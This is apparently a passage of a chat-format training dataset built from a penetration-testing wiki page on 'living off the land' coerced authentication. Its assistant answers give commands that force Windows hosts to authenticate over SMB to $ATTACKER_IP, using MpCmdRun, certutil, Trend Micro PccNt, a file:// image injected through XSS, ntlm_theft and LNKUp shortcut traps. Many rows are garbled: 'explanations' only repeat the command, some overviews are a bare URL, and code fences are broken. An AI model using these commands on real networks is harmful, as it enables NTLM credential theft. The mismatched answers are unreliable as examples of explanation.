traffic using HTTP."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Living off the land - Internet browser", "response": "Internet browsers can access HTTP servers by supplying their URL (i.e. http://$IP:$PORT/something) in the research bar. This technique is rarely used as it can pop up a prompt. This leads to an outgoing traffic using HTTP.", "metadata": {"corpus_index": 844, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Living off the land - Internet browser?"}, {"role": "assistant", "content": "Internet browsers can access HTTP servers by supplying their URL (i.e. http://$IP:$PORT/something) in the research bar. This technique is rarely used as it can pop up a prompt. This leads to an outgoing traffic using HTTP."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Living off the land - Internet browser?", "response": "Internet browsers can access HTTP servers by supplying their URL (i.e. http://$IP:$PORT/something) in the research bar. This technique is rarely used as it can pop up a prompt. This leads to an outgoing traffic using HTTP.", "metadata": {"corpus_index": 844, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Living off the land - HTML documents / XSS work?"}, {"role": "assistant", "content": "HTML documents can be crafted (or injected with content when successfully exploiting an HTML injection attack such as an Cross-Site Scripting) in way that could make browsers authenticate when accessing a remote resource. This leads to an outgoing traffic using SMB.\n\n``\n![](file://$ATTACKER_IP/something/something.png)\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Living off the land - HTML documents / XSS work?", "response": "HTML documents can be crafted (or injected with content when successfully exploiting an HTML injection attack such as an Cross-Site Scripting) in way that could make browsers authenticate when accessing a remote resource. This leads to an outgoing traffic using SMB.\n\n``\n![](file://$ATTACKER_IP/something/something.png)\n``", "metadata": {"corpus_index": 845, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Living off the land - HTML documents / XSS during a pentest?"}, {"role": "assistant", "content": "HTML documents can be crafted (or injected with content when successfully exploiting an HTML injection attack such as an Cross-Site Scripting) in way that could make browsers authenticate when accessing a remote resource. This leads to an outgoing traffic using SMB.\n\n``\n![](file://$ATTACKER_IP/something/something.png)\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Living off the land - HTML documents / XSS during a pentest?", "response": "HTML documents can be crafted (or injected with content when successfully exploiting an HTML injection attack such as an Cross-Site Scripting) in way that could make browsers authenticate when accessing a remote resource. This leads to an outgoing traffic using SMB.\n\n``\n![](file://$ATTACKER_IP/something/something.png)\n``", "metadata": {"corpus_index": 845, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Living off the land - HTML documents / XSS?"}, {"role": "assistant", "content": "![](file://$ATTACKER_IP/something/something.png)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Living off the land - HTML documents / XSS?", "response": "![](file://$ATTACKER_IP/something/something.png)", "metadata": {"corpus_index": 846, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `![](file://$ATTACKER_IP/something/something.png)`?"}, {"role": "assistant", "content": "This command is used for 🛠️ living off the land - html documents / xss. HTML documents / XSS"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `![](file://$ATTACKER_IP/something/something.png)`?", "response": "This command is used for 🛠️ living off the land - html documents / xss. HTML documents / XSS", "metadata": {"corpus_index": 846, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Living off the land - Web server file inclusion"}, {"role": "assistant", "content": "https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Living off the land - Web server file inclusion", "response": "https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/", "metadata": {"corpus_index": 847, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Living off the land - Web server file inclusion"}, {"role": "assistant", "content": "https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Living off the land - Web server file inclusion", "response": "https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/", "metadata": {"corpus_index": 847, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ Living off the land - Windows Defender Remote Scanning?"}, {"role": "assistant", "content": "``bash\nC:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.2010.7-0\\MpCmdRun.exe -Scan -ScanType 3 -File \\\\$ATTACKER_IP\\file.txt\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ Living off the land - Windows Defender Remote Scanning?", "response": "``bash\nC:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.2010.7-0\\MpCmdRun.exe -Scan -ScanType 3 -File \\\\$ATTACKER_IP\\file.txt\n``", "metadata": {"corpus_index": 848, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Living off the land - Windows Defender Remote Scanning?"}, {"role": "assistant", "content": "``bash\nC:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.2010.7-0\\MpCmdRun.exe -Scan -ScanType 3 -File \\\\$ATTACKER_IP\\file.txt\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Living off the land - Windows Defender Remote Scanning?", "response": "``bash\nC:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.2010.7-0\\MpCmdRun.exe -Scan -ScanType 3 -File \\\\$ATTACKER_IP\\file.txt\n``", "metadata": {"corpus_index": 848, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Living off the land - Windows Defender Remote Scanning during a pentest?"}, {"role": "assistant", "content": "C:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.2010.7-0\\MpCmdRun.exe -Scan -ScanType 3 -File \\\\$ATTACKER_IP\\file.txt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Living off the land - Windows Defender Remote Scanning during a pentest?", "response": "C:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.2010.7-0\\MpCmdRun.exe -Scan -ScanType 3 -File \\\\$ATTACKER_IP\\file.txt", "metadata": {"corpus_index": 849, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `C:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.2010.7-0\\MpCmdRun.exe -Scan -ScanType 3 -File \\\\$ATTACKER_IP\\file.txt`?"}, {"role": "assistant", "content": "This command is used for 🛠️ living off the land - windows defender remote scanning. Windows Defender Remote Scanning"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `C:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.2010.7-0\\MpCmdRun.exe -Scan -ScanType 3 -File \\\\$ATTACKER_IP\\file.txt`?", "response": "This command is used for 🛠️ living off the land - windows defender remote scanning. Windows Defender Remote Scanning", "metadata": {"corpus_index": 849, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Living off the land - Certutil work?"}, {"role": "assistant", "content": "``bash\ncertutil.exe -syncwithWU \\\\$ATTACKER_IP\\share\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Living off the land - Certutil work?", "response": "``bash\ncertutil.exe -syncwithWU \\\\$ATTACKER_IP\\share\n``", "metadata": {"corpus_index": 850, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ Living off the land - Certutil?"}, {"role": "assistant", "content": "``bash\ncertutil.exe -syncwithWU \\\\$ATTACKER_IP\\share\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ Living off the land - Certutil?", "response": "``bash\ncertutil.exe -syncwithWU \\\\$ATTACKER_IP\\share\n``", "metadata": {"corpus_index": 850, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the certutil.exe command to 🛠️ living off the land - certutil"}, {"role": "assistant", "content": "certutil.exe -syncwithWU \\\\$ATTACKER_IP\\share"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the certutil.exe command to 🛠️ living off the land - certutil", "response": "certutil.exe -syncwithWU \\\\$ATTACKER_IP\\share", "metadata": {"corpus_index": 851, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certutil.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ Living off the land - Certutil?"}, {"role": "assistant", "content": "certutil.exe -syncwithWU \\\\$ATTACKER_IP\\share"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ Living off the land - Certutil?", "response": "certutil.exe -syncwithWU \\\\$ATTACKER_IP\\share", "metadata": {"corpus_index": 851, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certutil.exe -syncwithWU \\\\$ATTACKER_IP\\share`?"}, {"role": "assistant", "content": "This command is used for 🛠️ living off the land - certutil. Certutil"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certutil.exe -syncwithWU \\\\$ATTACKER_IP\\share`?", "response": "This command is used for 🛠️ living off the land - certutil. Certutil", "metadata": {"corpus_index": 851, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Living off the land - Trend Micro Remote Scanning"}, {"role": "assistant", "content": "``bash\nC:\\Program Files (x86)\\Trend Micro\\OfficeScan Clien\\PccNt.exe \\\\$ATTACKER_IP\\s\\\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Living off the land - Trend Micro Remote Scanning", "response": "``bash\nC:\\Program Files (x86)\\Trend Micro\\OfficeScan Clien\\PccNt.exe \\\\$ATTACKER_IP\\s\\\n``", "metadata": {"corpus_index": 852, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Living off the land - Trend Micro Remote Scanning"}, {"role": "assistant", "content": "``bash\nC:\\Program Files (x86)\\Trend Micro\\OfficeScan Clien\\PccNt.exe \\\\$ATTACKER_IP\\s\\\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Living off the land - Trend Micro Remote Scanning", "response": "``bash\nC:\\Program Files (x86)\\Trend Micro\\OfficeScan Clien\\PccNt.exe \\\\$ATTACKER_IP\\s\\\n``", "metadata": {"corpus_index": 852, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Living off the land - Trend Micro Remote Scanning?"}, {"role": "assistant", "content": "C:\\Program Files (x86)\\Trend Micro\\OfficeScan Clien\\PccNt.exe \\\\$ATTACKER_IP\\s\\"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Living off the land - Trend Micro Remote Scanning?", "response": "C:\\Program Files (x86)\\Trend Micro\\OfficeScan Clien\\PccNt.exe \\\\$ATTACKER_IP\\s\\", "metadata": {"corpus_index": 853, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `C:\\Program Files (x86)\\Trend Micro\\OfficeScan Clien\\PccNt.exe \\\\$ATTACKER_IP\\s\\`?"}, {"role": "assistant", "content": "This command is used for 🛠️ living off the land - trend micro remote scanning. Trend Micro Remote Scanning"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `C:\\Program Files (x86)\\Trend Micro\\OfficeScan Clien\\PccNt.exe \\\\$ATTACKER_IP\\s\\`?", "response": "This command is used for 🛠️ living off the land - trend micro remote scanning. Trend Micro Remote Scanning", "metadata": {"corpus_index": 853, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Living off the land - Shortcut files (scf, lnk, url)"}, {"role": "assistant", "content": "SMB shares can be trapped with shortcut files that will automatically be handled by Windows' file explorer (e.g. a URL shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary). This leads to an outgoing traffic using SMB.\n\n> [!TIP]\n> Shares an account has WRITE privileges over can be mapped with smbmap (Python).\n> \n> ``bash\n> smbmap -d \"domain\" -u \"user\" -p \"password\" --host-file targets.txt\n> `\n\n> [!TIP]\n> Shortcut file names can be preprended with a @ symbol to put them on top of the share, to make sure the file explorer has to parse it.\n\n> [!TIP]\n> The ntlm_theft (Python) tool can be used to generate multiple file types at once (lnk, scf, url, docx, xslx, htm, xml, pdf, ...).\n> \n> `bash\n> ntlm_theft.py --generate all --server $ATTACKER_IP --filename \"@FILENAME\"\n> `\n\n::: tabs\n\n=== .lnk\n\nAn LNK shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n> Shortcuts with the .lnk extension have a lot of beneficial properties when it comes to stealth; they are an exception#Microsoft_Windows) from the Windows setting to show or hide file extensions. Even when “hide known file extensions” is disabled, explorer.exe will only show the name, allowing us to let it end in “.jpeg”. A major downside is that they only allow 1024 characters for the whole command they execute. (source)\n\nLNKUp (Python) is a great tool to generate malicious LNK shortcuts. They can be set with a remote icon file to generate outgoing SMB traffic and authentications but can also be set to execute commands when opened (i.e. double-clicked).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Living off the land - Shortcut files (scf, lnk, url)", "response": "SMB shares can be trapped with shortcut files that will automatically be handled by Windows' file explorer (e.g. a URL shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary). This leads to an outgoing traffic using SMB.\n\n> [!TIP]\n> Shares an account has WRITE privileges over can be mapped with smbmap (Python).\n> \n> ``bash\n> smbmap -d \"domain\" -u \"user\" -p \"password\" --host-file targets.txt\n> `\n\n> [!TIP]\n> Shortcut file names can be preprended with a @ symbol to put them on top of the share, to make sure the file explorer has to parse it.\n\n> [!TIP]\n> The ntlm_theft (Python) tool can be used to generate multiple file types at once (lnk, scf, url, docx, xslx, htm, xml, pdf, ...).\n> \n> `bash\n> ntlm_theft.py --generate all --server $ATTACKER_IP --filename \"@FILENAME\"\n> `\n\n::: tabs\n\n=== .lnk\n\nAn LNK shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n> Shortcuts with the .lnk extension have a lot of beneficial properties when it comes to stealth; they are an exception#Microsoft_Windows) from the Windows setting to show or hide file extensions. Even when “hide known file extensions” is disabled, explorer.exe will only show the name, allowing us to let it end in “.jpeg”. A major downside is that they only allow 1024 characters for the whole command they execute. (source)\n\nLNKUp (Python) is a great tool to generate malicious LNK shortcuts. They can be set with a remote icon file to generate outgoing SMB traffic and authentications but can also be set to execute commands when opened (i.e. double-clicked).\n\n``bash", "metadata": {"corpus_index": 854, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Living off the land - Shortcut files (scf, lnk, url)"}, {"role": "assistant", "content": "SMB shares can be trapped with shortcut files that will automatically be handled by Windows' file explorer (e.g. a URL shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary). This leads to an outgoing traffic using SMB.\n\n> [!TIP]\n> Shares an account has WRITE privileges over can be mapped with smbmap (Python).\n> \n> ``bash\n> smbmap -d \"domain\" -u \"user\" -p \"password\" --host-file targets.txt\n> `\n\n> [!TIP]\n> Shortcut file names can be preprended with a @ symbol to put them on top of the share, to make sure the file explorer has to parse it.\n\n> [!TIP]\n> The ntlm_theft (Python) tool can be used to generate multiple file types at once (lnk, scf, url, docx, xslx, htm, xml, pdf, ...).\n> \n> `bash\n> ntlm_theft.py --generate all --server $ATTACKER_IP --filename \"@FILENAME\"\n> `\n\n::: tabs\n\n=== .lnk\n\nAn LNK shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n> Shortcuts with the .lnk extension have a lot of beneficial properties when it comes to stealth; they are an exception#Microsoft_Windows) from the Windows setting to show or hide file extensions. Even when “hide known file extensions” is disabled, explorer.exe will only show the name, allowing us to let it end in “.jpeg”. A major downside is that they only allow 1024 characters for the whole command they execute. (source)\n\nLNKUp (Python) is a great tool to generate malicious LNK shortcuts. They can be set with a remote icon file to generate outgoing SMB traffic and authentications but can also be set to execute commands when opened (i.e. double-clicked).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Living off the land - Shortcut files (scf, lnk, url)", "response": "SMB shares can be trapped with shortcut files that will automatically be handled by Windows' file explorer (e.g. a URL shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary). This leads to an outgoing traffic using SMB.\n\n> [!TIP]\n> Shares an account has WRITE privileges over can be mapped with smbmap (Python).\n> \n> ``bash\n> smbmap -d \"domain\" -u \"user\" -p \"password\" --host-file targets.txt\n> `\n\n> [!TIP]\n> Shortcut file names can be preprended with a @ symbol to put them on top of the share, to make sure the file explorer has to parse it.\n\n> [!TIP]\n> The ntlm_theft (Python) tool can be used to generate multiple file types at once (lnk, scf, url, docx, xslx, htm, xml, pdf, ...).\n> \n> `bash\n> ntlm_theft.py --generate all --server $ATTACKER_IP --filename \"@FILENAME\"\n> `\n\n::: tabs\n\n=== .lnk\n\nAn LNK shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n> Shortcuts with the .lnk extension have a lot of beneficial properties when it comes to stealth; they are an exception#Microsoft_Windows) from the Windows setting to show or hide file extensions. Even when “hide known file extensions” is disabled, explorer.exe will only show the name, allowing us to let it end in “.jpeg”. A major downside is that they only allow 1024 characters for the whole command they execute. (source)\n\nLNKUp (Python) is a great tool to generate malicious LNK shortcuts. They can be set with a remote icon file to generate outgoing SMB traffic and authentications but can also be set to execute commands when opened (i.e. double-clicked).\n\n``bash", "metadata": {"corpus_index": 854, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the smbmap syntax for 🛠️ living off the land - shortcut files (scf, lnk, url)?"}, {"role": "assistant", "content": "> smbmap -d \"domain\" -u \"user\" -p \"password\" --host-file targets.txt\n> ```\n\n> [!TIP]\n> Shortcut file names can be preprended with a `@` symbol to put them on top of the share, to make sure the file explorer has to parse it.\n\n> [!TIP]\n> The [ntlm_theft](https://github.com/Greenwolf/ntlm_theft) (Python) tool can be used to generate multiple file types at once (lnk, scf, url, docx, xslx, htm, xml, pdf, ...).\n> \n> ```bash\n> ntlm_theft.py --generate all --server $ATTACKER_IP --filename \"@FILENAME\"\n> ```\n\n::: tabs\n\n=== .lnk\n\nAn LNK shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n> Shortcuts with the .lnk extension have a lot of beneficial properties when it comes to stealth; [they are an exception](https://en.wikipedia.org/wiki/Shortcut_(computing)#Microsoft_Windows) from the Windows setting to show or hide file extensions. Even when “hide known file extensions” is disabled, explorer.exe will only show the name, allowing us to let it end in “.jpeg”. A major downside is that they only allow 1024 characters for the whole command they execute. ([source](https://hatching.io/blog/lnk-hta-polyglot/))\n\n[LNKUp](https://github.com/Plazmaz/LNKUp) (Python) is a great tool to generate malicious LNK shortcuts. They can be set with a remote icon file to generate outgoing SMB traffic and authentications but can also be set to execute commands when opened (i.e. double-clicked)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the smbmap syntax for 🛠️ living off the land - shortcut files (scf, lnk, url)?", "response": "> smbmap -d \"domain\" -u \"user\" -p \"password\" --host-file targets.txt\n> ```\n\n> [!TIP]\n> Shortcut file names can be preprended with a `@` symbol to put them on top of the share, to make sure the file explorer has to parse it.\n\n> [!TIP]\n> The [ntlm_theft](https://github.com/Greenwolf/ntlm_theft) (Python) tool can be used to generate multiple file types at once (lnk, scf, url, docx, xslx, htm, xml, pdf, ...).\n> 